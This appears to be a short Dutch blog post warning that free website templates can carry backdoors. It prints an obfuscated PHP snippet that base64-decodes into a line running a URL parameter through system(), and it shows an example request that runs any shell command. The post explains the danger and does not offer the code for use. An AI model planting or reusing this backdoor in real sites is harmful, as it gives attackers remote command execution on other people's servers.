De gevaren van Free Premium Templates

Free Templates zijn overal en nergens te krijgen. Vraag aan Google waar we free templates kunnen krijgen en duizenden sites bevolken de zoekresultaten. Soms zien ze er leuk uit, vaker zijn ze simpel en dertien in een dozijn. Als dat alles was dan had ik me niet druk gemaakt, maar check onderstaande link naar OttoPress. Hierin wordt haarfijn uitgelegd dat de volgende code in een template direct toegang geeft tot de shell:

<?php@
$str1 = "0cmVhbT1AJF9HRVRbJz" . $HTTPS_ACCEPT_URLENCODING['KOI8-R'];
@$str2 = "B4RkYnXTtAc3lzdGVtK" . $HTTPS_ACCEPT_URLENCODING['WIN-1251'];
@$str3 = "CRuZXdzdHJlYW0pOw==" . $HTTP_ACCEPT_URLENCODING['UTF-8'];
@eval(base64_decode($_GET['salt'] . $str1 . $str2 . $str3));?>

Decodeert naar:

$newstream=@$_GET['0xFF'];@system($newstream);

Wat dus betekent dat:

“Make a hit to example.com?salt=JG5ld3N&0xFF=**any-command-I-want** and have it execute it in the shell.” LEUK! Lees de comments in het artikel voor meer voorbeelden.

http://ottopress.com/2011/decoding-a-russian-hackers-code/#comments

Leave a Reply

Your email address will not be published. Required fields are marked *

*

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>